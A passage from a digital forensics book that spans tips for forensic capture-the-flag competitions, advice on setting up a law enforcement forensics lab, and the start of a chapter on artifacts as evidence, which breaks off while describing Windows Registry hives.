I’m a Windows user through and through so I cannot offer much advice from a Mac or Linux
perspective. With that said, I do have some tools that I use from a forensic perspective to analyze
those types of evidence. Here are my favorite (free) tools that I use during CTFs:
General Analysis
- Autopsy¹⁵³
- Bulk Extractor¹⁵⁴
- DB Browser for SQLite¹⁵⁵
- FTK Imager¹⁵⁶
- Hindsight¹⁵⁷
Chromebook
- cLEAPP¹⁵⁸
Ciphers
- CyberChef¹⁵⁹
- dcode.fr¹⁶⁰
Google Takeout / Returns
- RLEAPP¹⁶¹
Mac
- mac_apt¹⁶²
- plist Editor - iCopyBot¹⁶³
Malware/PE
- PEStudio¹⁶⁴
- PPEE (puppy)¹⁶⁵
Memory/RAM
- MemProcFS¹⁶⁶
- Volatility¹⁶⁷
¹⁵³https://www.autopsy.com/
¹⁵⁴https://github.com/simsong/bulk_extractor
¹⁵⁵https://sqlitebrowser.org/dl/
¹⁵⁶https://www.exterro.com/ftk-imager
¹⁵⁷https://dfir.blog/hindsight/
¹⁵⁸https://github.com/markmckinnon/cLeapp
¹⁵⁹https://gchq.github.io/CyberChef/
¹⁶⁰https://www.dcode.fr/en
¹⁶¹https://github.com/abrignoni/RLEAPP
¹⁶²https://github.com/ydkhatri/mac_apt
¹⁶³http://www.icopybot.com/plist-editor.htm
¹⁶⁴https://www.winitor.com/
¹⁶⁵https://www.mzrst.com/
¹⁶⁶https://github.com/ufrisk/MemProcFS
¹⁶⁷https://www.volatilityfoundation.org/releases
Chapter 6 - Gamification of DFIR: Playing CTFs 141
Mobile Devices
- ALEAPP¹⁶⁸
- Andriller¹⁶⁹
- APOLLO¹⁷⁰
- ArtEx¹⁷¹
- iBackupBot¹⁷²
- iLEAPP¹⁷³
Network
- NetworkMiner¹⁷⁴
- Wireshark¹⁷⁵
Windows Analysis
- Eric Zimmerman tools / KAPE¹⁷⁶
- USB Detective¹⁷⁷
This whole list could be expanded way further but this is the majority of the go-tos in my toolkit.
Tips for Playing - During
We’ve all been there. You get to a point in the middle of a CTF where you start to struggle. Here are
some things to key in on while actually playing.
Read the titles of the questions carefully. Often they are riddled with hints about where to look.
“Fetch the run time of XXX application.” Maybe you should analyze those Prefetch files over there?
Questions will often also tell you how to format your answer submission. This may tell you that the
timestamp you’re hunting could be incorrect – those pesky timezone offsets!
Did you find a flag that appears to be a password? It’s almost guaranteed that that evidence was
placed in such a way that it will be reused. Emails and notes can be a treasure trove for passwords
to encrypted containers or files.
One thing that may seem silly but can help is to just ask questions. If you’re stumped on a question,
talk to the organizer if you can, they may lead you in a direction that you didn’t think of when you
set off on a path of destruction.
¹⁶⁸https://github.com/abrignoni/ALEAPP
¹⁶⁹https://github.com/den4uk/andriller
¹⁷⁰https://github.com/mac4n6/APOLLO
¹⁷¹https://www.doubleblak.com/software.php?id=8
¹⁷²http://www.icopybot.com/itunes-backup-manager.htm
¹⁷³https://github.com/abrignoni/iLEAPP
¹⁷⁴https://www.netresec.com/?page=NetworkMiner
¹⁷⁵https://www.wireshark.org/
¹⁷⁶https://ericzimmerman.github.io/#!index.md
¹⁷⁷https://usbdetective.com/
Chapter 6 - Gamification of DFIR: Playing CTFs 142
9.5 - Don’t Sweat It, Take the Hint
Some CTF competitions have a built-in hint system. If they don’t count against your overall score,
take them! The chance of a tiebreaker coming down to who used fewer hints is extremely small. If
the hint system costs points you will need to weigh the pros and cons of not completing a certain
high point question as opposed to losing 5 points for buying that hint.
The last tip for playing is to write down your submissions, both the correct and incorrect ones. I can’t
tell you the number of times I’ve entered the same answer wrongly into a question to eventually get
points docked off my total. This will not only help you during the live CTF but afterwards as well
if you write a blog on your walkthroughs.
Chapter 6 - Gamification of DFIR: Playing CTFs 143
Strategies
There are multiple strategies that you could use for attacking the questions during the competition.
Usually they will be broken out into different categories by type of evidence such as Mobile /
Computer / Network / Hunt. Some people prefer to try and finish all questions in one section before
jumping to the next one. If you’re really good at mobile forensics, for instance, starting with those
questions may be a good strategy if you are less experienced in other areas.
Another potential strategy depends on how many points the questions are worth. Usually, the more
the points, the harder the question. Some people prefer to try to get high-value questions first to put
large points on the scoreboard and put the pressure on other competitors. Others prefer to go for the
lower point questions first and work their way up.
My personal strategy is a combination of them all. I will typically go more towards the easy points
first and work my way up from there, but I will jump from different evidence categories once I
start to get stuck. Depending on how much pre-work analysis has been done, I may have inferred
references to areas that need to be analyzed. I can then look for questions that I may already have
answers for.
And then there are the ones that are confident (sometimes too confident!). Some players, knowing
that they have the answers already, will hold off on submitting for points until very late in the
competition to mess with the other competitors. Some CTF competitions will freeze the board the
last 15-30 minutes to make the final scores a surprise to all. I would advise against this tactic, but if
you’re that confident then by all means. At the end of the day, the right strategy is whatever suits
the player the best.
“You miss 100% of the shots you don’t take – Wayne Gretzky” – Michael Scott
Chapter 6 - Gamification of DFIR: Playing CTFs 144
Takeaways
What is it that you can take away from playing a CTF, you ask? You may have different feelings
about what you get out of playing CTFs, but here are a few of my personal takeaways.
Documentation
One of the things I enjoy doing after playing a CTF is to do blog writeups of solutions. If there are
questions I didn’t get to finish during the live competition, I have a tendency to go back and revisit
to see if I can solve them properly. Once I have a majority of the answers, I will start to write some
blogs on how I solved the questions. Not only does this help me document my results for future
usage, but it also helps with gaining experience in more technical writing. I can’t tell you the many
times that I’ve referenced my own posts in other competitions or in research as I go back to further
dive into file system locations that I had never looked at before.
Documentation is critical in a lot of aspects of an investigation, so it only makes sense to write down
your notes in case you need to reference where a specific artifact came from. The best part is that not
all questions will be solved the same. I thoroughly enjoy reading other solvers’ thought processes
for getting to the end result.
Challenge Yourself & Build Confidence
I’m going to stress it again; playing CTFs will help you learn. For those that don’t get to work with
some of the different evidence files like Linux or network files, the CTF datasets will give you plenty
to take home from analyzing them. Before playing SANS NetWars, I had rarely touched PCAP files
let alone knew how to utilize Wireshark to pull out files or specific packets. Learning about Google
Takeout exports has given me a new appreciation for what potential evidence can be found in the
cloud and what may not be found directly on a mobile device. This has lead to me doing my own
research and contributing back to the community in tools like RLEAPP¹⁷⁸ and other open-source
projects. These are just a few examples of getting out of your comfort zone and challenging yourself
to learn about new tools and techniques.
It’s also important to build your confidence. Just because you don’t place well the first time you
play doesn’t mean you can’t get better. I know when I started out I struggled in competitions. I
didn’t know where to go to find answers or how to get to them. It all comes back to practice. Any
athlete will tell you that repetitions of a task will only make you better at that specific task, and it
is no different with CTFs and examinations. If you see something often enough, you’ll start seeing
patterns like Neo in the Matrix.
¹⁷⁸https://github.com/abrignoni/rleapp
Chapter 6 - Gamification of DFIR: Playing CTFs 145
9.6 - “I know kung-fu!”
Have Fun!
The number one takeaway of playing CTFs is to have fun! These are meant to be a training exercise
to stimulate the mind and to give you a break from your normal workload. Don’t stress it, just keep
learning. If you’re in person, enjoy the camaraderie of other competitors and build your network.
You never know who you may meet while playing and who you will cultivate friendships with in
the industry.
I hope this chapter breathes new life into you playing CTF competitions. Good luck and see you all
out there on the digital battlefields!
Chapter 7 - The Law Enforcement
Digital Forensics Laboratory
Setting Up and Getting Started
By Jason Wilkins¹⁷⁹ | Website¹⁸⁰ | Discord¹⁸¹
Executive Cooperation
The necessity of executive cooperation
When I was approached by my superiors at the police department to establish a Digital Forensics lab,
I felt immediately overwhelmed and intimidated, being that I was so new to the field and unsure
of my ability to successfully achieve the task. I began scouting the internet for ideas and advice
on what tools would be needed and what training I would require. After deciding on the software
that we would begin using in our lab, I began the year-long training offered by the company to
get certified in their product. It was here that I met my first mentor and really began having my
questions answered. He introduced me to the Digital Forensics Discord Server and AboutDFIR.com,
and these two tools alone have done so much to reduce the barriers to entry that existed prior to
their creation.
As I gained confidence in my abilities, and familiarity within the industry, I was more able to
approach my executive leadership in a way that facilitated a more professional understanding that
would lead to greater cooperation in budgeting and planning.
¹⁷⁹https://twitter.com/TheJasonWilkins
¹⁸⁰https://www.noob2pro4n6.com/
¹⁸¹http://discordapp.com/users/656544966214025256
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 147
To say that Digital Forensics can be expensive, is quite often an understatement. Many law
enforcement agencies do not have the budget to even make the attempt. In those cases, they usually
depend upon other larger agencies, the state or federal labs, or do not attempt the feat at all.
Making your case to executive leadership
In these times, every crime contains an aspect of digital evidence. As detectives and prosecutors
attempt to add legs to the table of their argument, they are forced to acknowledge the value of
Digital Forensics in nearly every case.
Most law enforcement executives understand this and will be already amenable to the idea that it
would be a great addition to their department. However, anywhere that cost is involved, they will
initially resist the eager forensic examiner wishing to purchase every cool toy available. You must
be professional, courteous, and extremely patient if you wish to be taken seriously. Create a business
plan for the lab that is complete with a section for the present state and future goals. Make a list of
tools and training that is needed with prices and a budget for everything. Include the cost of payroll
for analysts and use this financial bottom-line strategy to sell the idea to your decision-makers. I
would advise caution when using the technique of asking for the world in hopes of blind acceptance.
This will do very little to add credibility to your reputation and may hinder you in the future when
you need to ask for more.
The way that I decided to go was to determine just what was necessary to get started and return to
ask for anything more as I encountered roadblocks.
Open communication and trust
By showing respect and understanding for the position and responsibility of the executive leadership
to the tax-paying citizens of our community, I was able to earn their trust and cooperation. I have
never received a negative response to any request that I have made. As soon as an obstacle was
encountered and a solution was needed that the lab did not already provide for, I made the request
and either received the approval for what was needed or was given a timeline of when the funds
would be available. Open communication and trust are necessary for any relationship to maintain
the integrity and it is no different for professional cooperation than it is for personal connection.
Always approach decision makers with respect and then console yourself with patience and faith
in their response. As an examiner, you are not always enlightened to all issues of budgetary and
sometimes legal or political impact that may affect your request. This is where the trust that you
would like to be shown must be reciprocated in kind.
By approaching every situation in this way, you will earn the respect and trust of your executive
leadership and make your professional life more satisfying in the long run.
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 148
Physical Requirements
Physical security and accessibility
When you begin to create the business plan for the digital forensics lab, you will need to first find
a suitable space that will provide physical security and room to accommodate your personnel and
equipment. A small department using low-cost and free tools may only require a single examiner,
an office with one computer, and a desk. A larger agency may require space for several people,
workstations, evidence lockers, and lab equipment. The fact is that you can begin implementing
digital forensics in your agency with free tools and existing personnel and hardware. However, you
will find yourself running up against obstacles immediately and wanting better solutions. Either
way, it is because you are handling evidence that may implicate or exculpate someone of criminal
behavior that you need to take security very seriously from the start. Chain of custody and physical
access control should be at the forefront of your thoughts throughout the forensic process. At the
very least, the lab should be locked when unoccupied and all keyholders accounted for. Digital ID
scan access gives accountability and access deniability and is relatively low cost in implementation.
Floor plans
The floor plan that you decide upon is going to be very distinctly individual to your agency’s needs
and capability. However, you should take into account the number of devices that you believe you
will be handling, the amount of time that you will have possession of them for storage purposes,
and how many people you will have assigned to the lab. If your lab only has one examiner, and
only handles a hundred or so mobile devices a year, then you may get by with a space as small
as a ten-by-ten office with a desk for your computer, a cabinet or shelves for your devices, and a
file cabinet for your case files. As you expand capabilities and personnel, however, you will quickly
outgrow that amount of space. With microscopes, faraday cages, and extra workstations, you will
require room for the movement of individuals between tables. With a greater number of devices,
you will need more room for shelves, charging cabinets, and workflow organization. Mobile devices
quickly begin stacking up and becoming disorganized chaos if you do not establish sound workflow
processes and case management practices. You need to know which devices are next in line, which
are being processed, and which are ready to be returned. If a device is lost while in your custody, it
will have serious consequences for yourself, your agency, and most importantly, for the case. Having
the space to organize your work properly is therefore of paramount importance.
Selecting Tools
Network Requirements
Your forensic workstations and tools may or may not require a connection to the internet, but when
they do, you should at least utilize a dedicated line and/or a virtual private network. Malware can
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 149
be transferred from devices to your system and network if you are not careful. Even the forensic
software that you have on your workstation can set off alarms in your IT department. Trust me
on that one. I speak from experience. It was just that sort of event that convinced my IT director
that I needed a dedicated connection. You may find that you need one connection for your forensic
workstations and another separate one for your administrative computer. Just be aware of the very
real danger to your network that is presented by strange devices. Even a detective bringing you a
thumb drive to place evidence on can present an unwary threat. Always practice safe handling of
devices when considering making any connections to your system.
Selecting forensic workstations
This is perhaps the most common question asked when someone first considers getting into digital
forensics. What kind of computer is needed for the job? It is also the most fun part for those of us
who nerd out over computer specifications and configurations. Boiling it down, you will need great
processing power and vast storage. Always refer to the software that you choose first to determine
what the minimum and optimal specifications are for that particular tool. I have found that you will
basically be building a super gaming computer because of the amount of graphics processing that
you will need to accomplish. It is because of this that you may need to convince your superiors that
you are not trying to play video games in the lab when you are supposed to be working. That said,
I will give you the specifications that I had on my first workstation at the police department.
• Dell Precision 5820 Tower X-Series
• Intel Core i9-9820X CPU @ 3.30 GHz, 3312 Mhz with 10 cores, 20 logical
• Radeon Pro WX 5100 Graphics Card (I wanted an NVIDIA GeForce 3060 at the time)
• 128 GB RAM
• 1TB SSD (for the Operating System and Program Files)
• 2x 4 TB Hard Drives (for File Storage)
I wanted an Alienware Aurora desktop, but compromised for the above setup. Never forget that you
are asking to spend other people’s money when working in Law Enforcement and you may have to
make concessions for that very reason. Always show gratitude and a positive attitude when granted
anything.
Selecting forensic software
I want to preface this section with the acknowledgment that I have made many friends in the field
of digital forensics in the few short years that I have been working in the industry. Some work for
companies that make competing software. I have found that collaboration even among competitors
is like nothing seen in any other market. That said, I will not be granting any single product my sole
endorsement, but rather will describe the pros and cons of each, as I see them.
The largest players in commercial off-the-shelf digital forensics solutions are Magnet Forensics,
Cellebrite, Oxygen Forensics, Belkasoft, Exterro, Basis Technology, MSAB, and EnCase. These are
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 150
not in any particular order, and I have not intentionally excluded any not listed. These are just the
products that I have had personal experience with and see most often discussed between examiners.
In my day-to-day operations, I use both Magnet AXIOM and Cellebrite, depending on which report
my detectives prefer. A smaller agency may not have the budget for both or either. Autopsy is an
excellent free program from Basis Technology and was created by Brian Carrier. I have used it to
validate evidence extracted with commercial tools to great success. I would recommend it to be a
must-have for every lab for that very reason.
When considering open-source and free software, always use a test environment before implement-
ing it in a production network. There are many exciting and brilliant tools made freely available
to the community by their authors and some of which allow you to contribute code towards their
improvement. Thanks to Brian Carrier, we have Autopsy, as Eric Zimmerman gave us KAPE and EZ
Tools, and Alexis Brignoni, the Log Events and Properties Parser (xLEAPP) series. There are so many
wonderful free tools out there that you could fill an entire book and you will discover them and want
to try them out as much as possible, as there is no single tool that does everything perfectly. As an
examiner, you will need to be a lifelong learner and stay connected to the community to remain on
top of new discoveries, tools, and techniques.
Selecting peripheral equipment
You will find very quickly that workstations and software are only the beginning of your expen-
ditures. Many peripheral devices and tools will also need to be purchased to assist with various
examinations. You can plan to purchase them upfront or as needed. In some cases, you may only
use the device once in several years. While this list is in no way extensive or exclusive, it is exemplary
of the tools that I purchased for my lab as I discovered the need for them.
• A digital camera for photographing devices and crime scenes. It is helpful to purchase one
capable of video recording in high definition and connecting to your workstation for file
transfer
• An external SSD drive for transferring files between workstations. The larger and faster, the
better
• Computer hand tools that can be purchased specifically for computer or mobile device repair
• A heat gun for melting the glue around a mobile device touchscreen
• A magnifying visor with a light for seeing small screws and writing
• Various cables for connecting to various types of hard drives and SSDs. (I.E. IDE, ATA, SATA,
USB)
• Data transfer cables for various types of phones (i.e. Lightning, Micro USB, USB-C, Mini USB)
• An anti-static mat
• Write blocker for preventing data writes on target hard drives
• A charging cabinet for devices that are bruteforcing
• Faraday bags and a faraday cage for preventing devices from touching mobile networks
• External battery chargers for transferring low-power devices from the crime scene to the lab
• SIM card and SD card readers
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 151
• APC Battery backup and surge protector for your expensive workstations
There are many other items for which you may or may not discover the need as your caseload grows,
but these items are the most likely. You may also consider purchasing cloud services for the storage
of digital evidence or have your IT department set up dedicated server space that can be expanded.
Smaller agencies may just use hard drives stored in the evidence locker.
Planning for Disaster
You will want to have a disaster recovery plan for lightning strikes, flooding, fire, earthquake, or
simply hardware failure and viruses. You will invest tens of thousands of dollars and countless
hours planning, purchasing, and setting up your lab. A good disaster recovery plan protects that
investment. You may include a backup plan for your workstation once per week. The rule is to store
at least one copy of backups on site and duplicate copies at an off-site location. You may want to log
all updates to your workstation in case you encounter an issue and need to roll-back or troubleshoot
new problems. Keep your forensic workstation on a dedicated network of its own if it needs to have
an internet connection at all. Invest in a good antivirus and monitoring tool. In the recovery plan,
you will also need to consider upgrading components every two to three years as wear will degrade
your equipment over time.
Certification and Training
Some US States require digital forensics examiners to be certified. Whether or not that is the case
for your location, it is good to consider having at least one examiner certified and trained to teach
others. There are non-profit organizations such as the National White Collar Crime Center (NW3C)
that offers both training and certification for Cyber Crime Examiners and Investigators free of cost
to law enforcement or government personnel. The training is on par with for-profit organizations
and the certification is much less costly. There is no exam as it is experience based, and it lasts for one
year. As stated, there are also for-profit organizations that offer certification and individual vendors
that certify users of their specific tools.
Why should you get certified?
In any case, it is worth the investment of time and money and greatly helpful when called to the
stand in court. Your testimony will carry more weight if you are certified and the knowledge gained
from the training involved will help you to make competent and confident statements when cross-
examined.
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 152
Where to find training
I always suggest to everyone to begin their quest for information at AboutDFIR.com¹⁸². You will
find ample resources and an updated list of training with prices. Some other sites to consider are
DFIRDiva.com¹⁸³ and DFIR.Training¹⁸⁴. SANS Institute¹⁸⁵ has very reputable programs for training
and certification that is recognized worldwide, though costly and not recommended (by me) for
inexperienced examiners. Their certification exams are open book and timed and you are given
practice tests prior to taking the final. Should you achieve this level of certification, you will
definitely be considered a member of an elite class of Digital Forensics Examiners.
Creating a training plan for your lab
Whether you are the only examiner or you have multiple people working in your lab, you need to
have a training plan for everyone, especially if they are trying to maintain certifications that require
annual credit hours for reinstatement.
Accreditation
Accreditation is not mandatory in the United States, but it is highly recommended. However, it may
become mandatory in the future and therefore is worth mentioning and describing. The ANSI-ASQ
National Accreditation Board (ANAB)¹⁸⁶ is a subsidiary of the American National Standards Institute
(ANSI)¹⁸⁷ and the American Society for Quality (ASQ)¹⁸⁸. In order to have your lab considered for
accreditation, ANAB will audit the lab’s tasks and functions to ensure correct procedures are being
followed consistently.
Budgeting for the lab
Digital Forensics is an expensive operation. You will need to budget appropriately for your lab to
continue successfully and responsibly. Plan for hardware and software licensing costs alongside
training, certification, and expansion costs. Create a monthly, quarterly, and annual expenditure
spreadsheet. Estimate your total annual number of examinations and type of cases as you may need
to plan for the purchase of new software or hardware for use in special circumstances. Planning for
future operations is critical as technology evolves quickly and storage size on devices grows rapidly.
Training is absolutely necessary to maintain knowledge of new operating systems and hardware.
¹⁸²https://aboutdfir.com/
¹⁸³https://dfirdiva.com/
¹⁸⁴http://dfir.training/
¹⁸⁵https://www.sans.org/
¹⁸⁶https://anab.ansi.org/
¹⁸⁷https://ansi.org/
¹⁸⁸https://asq.org/
Chapter 7 - The Law Enforcement Digital Forensics Laboratory 153
Duties and responsibilities
ANAB requires that specific objectives be determined for each role within a digital forensics lab by
the lab manager who is responsible for establishing, enforcing, and reviewing, procedures for case
management. The manager also plans for updates and upgrades and accounts for all activities and
training within the lab. Other lab members should have enough training to utilize their equipment
effectively and should report directly to the lab manager.
Privacy Policy
Any law enforcement digital forensics lab should consider having a privacy policy regarding the
handling of digital evidence. There are websites such as NATSAR.com¹⁸⁹ that offer model policies
for a price, but you can also reach out to the community through the Digital Forensics Discord Server
for free copies of other agency policies. Having a privacy policy will go far to protect your agency
and lab members from litigation in high-profile cases.
Standard Operating Procedures
It should go without saying that having Standard Operating Procedures (SOP) developed, main-
tained, and reviewed by the lab manager is a good consideration. Not only is it required for
accreditation, but it will also protect the agency from litigation in much the same way as having a
privacy policy. By creating SOPs that are based on national standards from the Scientific Working
Group on Digital Evidence (SWGDE)¹⁹⁰ or the National Institute of Standards and Technology
(NIST)¹⁹¹, you can rest assured that your lab is operating within accreditation standards.
Chapter Summary
In summary, a law enforcement digital forensics lab operates to conduct criminal investigations and
store evidence. The outcome of a murder investigation and the exoneration of an innocent suspect
may be entirely determined by the work done by lab members. That responsibility should weigh
heavily upon each person involved and be considered in day-to-day operations as well as future
planning. The setup and maintenance of an effective lab can be an expensive operation, and the
obligation to tax-paying citizens should be a constant presence in the mind of the lab manager. As
Law Enforcement Examiners, your duty is to protect and serve the community and your agency.
Always remember that, and strive to make your lab better every day, by improving your skills and
knowledge, that of other lab members, and your equipment. Serve with pride in knowing that your
mission is noble and impactful, and you will be joined by a global community of Digital Forensics
Examiners that will welcome you into the fold.
¹⁸⁹https://natsar.com/
¹⁹⁰https://www.swgde.org/
¹⁹¹https://www.nist.gov/
Chapter 8 - Artifacts as Evidence
By Nisarg Suthar¹⁹²
Forensic Science
Before learning about artifacts as digital evidence, I’ll preface this chapter with the most fundamental
definition of basic science. So what is Science? It is a field that follows a scientific process in any
domain. That process is cyclical and goes something like this:
• We make observations in nature.
• We form an initial hypothesis about something.
• We look for things that confirm or deny the formed hypothesis.
• If we find something that denies it, we form a new hypothesis and go back to making
observations.
• If we find something that confirms it, we continue making new observations to extend our
dataset and verify the hypothesis until the dataset is substantial in confirming it precisely and
accurately. If we further find something that denies the original hypothesis, we form a new
one by repeating the process.
¹⁹²https://linktr.ee/NisargSuthar
Chapter 8 - Artifacts as Evidence 155
We never pollute this scientific process with biases or opinions. It is only credible as far as the fact
finder’s neutrality goes. All scientists trust observations and verified prior research, discarding all
speculation.
16.1 - Attr: GliderMaven, CC BY-SA 4.0, via Wikimedia Commons
Ultimately, the goal of any science is not to state things in absolutes but in observations, experiments,
procedures, and conclusions. Even the fundamental laws of science begin with a basic foundation
laid of assumptions.
Much like any scientific field, ‘forensics’ or ‘criminalistics’ is a branch of science that deals with
identifying, collecting, and preserving evidence of a crime. It is not just identifying, collecting, and
preserving but doing so in a forensically sound manner. What that means is that evidence should
not be changed or stray away from its true form.
Digital Forensics is a six-phase process including:
• Preparation: Making sure your suite of forensic tools is up to date, and destination media are
sanitized.
• Identification: Identifying the devices of interest at the site. Mobile phones, laptops, IoT devices,
USB drives, cameras, SD cards, etc. Anything with some type of digital memory.
• Collection: Acquiring the memory via imaging and hashing the sources for verification.
• Preservation: Using techniques viable for long-term storage of sensitive evidence. Also includes
maintaining a valid chain of custody.
• Analysis: Dissecting the acquired evidence. All puzzle solving and brainstorming happens in
this phase.
• Reporting: Preparing a concise and easily digestible report of your findings for people who may
not be technically inclined. The report must show forensic soundness for it to be admissible in
a court of law.
Chapter 8 - Artifacts as Evidence 156
Types of Artifacts
Analysis is a major phase where forensicators discover different types of artifacts ranging from plain
metadata to complex evidence of execution and residual traces. The vast gap between the difficulty
of retrieving or reconstructing evidence determines the fine line between E-Discovery and Digital
Forensics.
User data such as internet history, images, videos, emails, messages, etc., fall under E-Discovery. It
is relatively easy to reconstruct even from the unallocated space.
However, System Data-like artifacts that help support some view of truth, or determine how closely
a transpired event is to the evidence, are not that simple to manually parse with forensic soundness,
which is why often times forensicators rely on well-known parsing tools, either commercial or open-
source.
16.2 - Attr: Original from 6th slide in DVD included with E-Discovery: An Introduction to Digital Evidence by Amelia
Phillips, Ronald Godfrey, Christopher Steuart & Christine Brown, modified here as text removal
And that is the main difference between E-Discovery & Digital Forensics, depending on the
categorization of data alone. Both follow different procedures and have different scopes of execution.
Generally, E-Discovery can be contained to only the logical partitions and the unallocated region,
whereas Digital Forensics operates in a much wider scope solely due to the necessity of dealing with
complex data structures.
Chapter 8 - Artifacts as Evidence 157
What is Parsing?
This brings us to parsing. We often go around throwing the term while working with a variety of
artifacts; “Parse this, parse that”, but what does it mean in the real sense? To understand the parsing
methodology, tools & techniques, we must be familiar with the origin of the handling of the data
being parsed. What I mean by that is how the data was originally meant to be handled. What was
its structure by design? How can it be replicated?
Generally, it is some feature or underlying mechanism of the main operating system installed on
the device. Parsing tools are written to accurately mimic those functions of the operating system,
which make the raw data stored on the hardware human readable.
16.3 - Attr: Kapooht, CC BY-SA 3.0, via Wikimedia Commons
Understand the operating system as an abstraction level between the end-user and the intricacies of
raw data. It provides an interface to the user which hides all the complexities of computer data and
how it is being presented.
Before parsing the artifacts and diving deep into analysis, you must fully understand how files are
generally handled by an operating system. As mentioned earlier, an operating system is just a very
sophisticated piece of software written by the manufacturers to provide an abstraction level between
the complexities of hardware interactions and the user.
In the context of file handling, operating systems either store files or execute files. Both of which
require different types of memory. Also, note that storing files requires access to storage media such
as HDDs, SSDs, and flash drives, whereas executing files requires access to the microprocessor. Both
are handled by the operating system.
Chapter 8 - Artifacts as Evidence 158
As you might already know, computers, or any electronic computing device for that matter, primarily
utilize two types of memory:
1. RAM (Random Access Memory):
• Volatile memory, only works for the time power is supplied.
• Used for assisting the execution of applications/software by the processor of the device.
2. ROM (Read Only Memory):
• Non-volatile memory, retains data even when not in use.
• Used for storing the application files for a larger period of time.
There are many sub-types of both RAM & ROM, but only the fundamental difference between them
is concerned here.
Now let’s look at the lifecycle of an application in two stages:
1. Production Cycle:
An application is a set of programs. A program is a set of code written by a programmer, generally, in
higher-level languages, that does not interact directly with machine-level entities such as registers,
buses, channels, etc. That piece of code is written to the disk. The code is then compiled to assembly,
which is a lower leveled language that can interact directly with machine-level entities. Finally,
the assembly is converted to the machine code consisting of 1s and 0s (also known as binary or
executable file), which is now ready for its execution cycle.
2. Execution Cycle:
Now that the program is sitting on the disk, waiting to be executed, it is first loaded into the
RAM. The operating system instructs the processor about the arrival of this program and allocates
the resources when they’re made available by the processor. The processor’s job is to execute the
program one instruction at a time. Now the program can execute successfully if the processor is not
required to be assigned another task with a higher priority. If so, the program is sent to the ready
queue. The program can also terminate if it fails for some reason. However, finally, it is discarded
from the RAM.
Chapter 8 - Artifacts as Evidence 159
You can easily remember both of these cycles by drawing an analogy between electronic memory
and human memory. Here, I use chess as an example. Our brains, much like a computer, uses two
types of memory:
1. Short-term (Working memory):
• For a game of chess, we calculate the moves deeply in a vertical manner for a specific line
based on the current position.
• This is calculative in nature. The calculation comes from the present situation.
2. Long-term (Recalling memory):
• At the opening stage in a game of chess, we consider the candidate moves widely in a
horizontal manner for many lines.
• This is instinctive in nature. Instinct comes from past experiences.
Understanding how an operating system parses the data from different sources, whether it is on
disk or in memory, will help you identify, locate, and efficiently retrieve different types of artifacts
necessary for an investigation.
Chapter 8 - Artifacts as Evidence 160
Artifact-Evidence Relation
You will come across an ocean of different artifacts in your investigations, but artifacts have a very
strange relationship with what might potentially be considered evidence. Artifacts alone do not give
you the absolute truth of an event. They provide you with tiny peepholes through which you can
reconstruct and observe a part of the truth. In fact, one can never be sure if what they have is indeed
the truth in its entirety.
16.4 - Attr: Original by losmilzo on imgur, modified here as text removal
Chapter 8 - Artifacts as Evidence 161
I always love to draw an analogy between the artifacts and the pieces of a puzzle, of which you’re
not certain to have the edge or the corner pieces. You gather what you can collect and try to paint
the picture as unbiased and complete as possible.
16.5 - Attr: By Stefan Schweihofer on Pixabay
That being said, if you apply the additional knowledge from metadata, OSINT, and HUMINT to
the parsed artifacts, you might have something to work with. For instance, say you were assigned
an employee policy violation case where an employee was using their work device for illegally
torrenting movies. Parsing the artifacts alone will give you information about the crime, but not as
evidence. You would still need to prove that the face behind the keyboard at the time of the crime
was indeed the one that your artifacts claim. So you would then look for CCTV footage around the
premises, going back to the Identification phase in the Digital Forensics lifecycle, and so forth and
so on.
As a result of the codependency of the artifacts on drawing correlations to some external factor,
they form a direct non-equivalence relation with evidence. However, note that this “rule”, if you
will, is only applicable to a more broad scope of the investigation. In the more narrow scope as a
forensicator and for the scope of your final forensic report, artifacts are most critical. Just keep it
in the back of your mind that encountering an artifact alone doesn’t mean it’s admissible evidence.
Parse the artifact, make notes, and document everything. Being forensically sound is more important
than worrying about completing the entire puzzle because there will be no edge or corner pieces to
it.
Chapter 8 - Artifacts as Evidence 162
Examples
This section will cover how some of the more uncommon artifacts can play into a case from a
bird’s eye view. We won’t be getting into the technical specifics on the parsing or extraction, but
rather the significance of those artifacts at a much higher level, including what it offers, proves, and
denies. Additionally, what is its forensic value? I suggest the readers use these brief bits to spark
their curiosity about these important artifacts and research on their own about locating and parsing
them.
Registry
About:
• The Windows Registry is a hierarchical database used by the Windows operating system to
store its settings and configurations. Additionally, it also stores some user data pertaining to
user applications, activities, and other residual traces.
• The Registry is structured with what are called Hives or Hive Keys (HK) at the top-most level.
Each hive contains numerous keys. A key can contain multiple sub-keys. And sub-keys contain
fields with their values.
There are mainly two types of hive files:
1. System Hive Files:
• SAM (Security Account Manager): User account information such as hashed passwords,
and account metadata including last login timestamp, login counts, account creation
timestamp, group information, etc.
• SYSTEM: File execution times (Evidence of Execution), USB devices connected (Evidence
of Removable Media), local timezone, last shutdown time, etc.
• SOFTWARE: Information about both user and system software. Operating System infor-
mation such as version, build, name & install timestamp. Last logged-on user, network
connections, IP addresses, IO devices, etc
• SECURITY: Information about security measures and policies in place for the system.
2. User Specific Hive Files:
• Amcache.hve: Information about application executables (Evidence of Execution), full path,
size, last write timestamp, last modification timestamp, and SHA-1 hashes.
• ntuser.dat: Information about autostart applications, searched terms used in Windows
Explorer or Internet Explorer, recently accessed files, run queries, last execution times of
applications, etc.
• UsrClass.dat: Information about user-specific shellbags is covered in the next section.
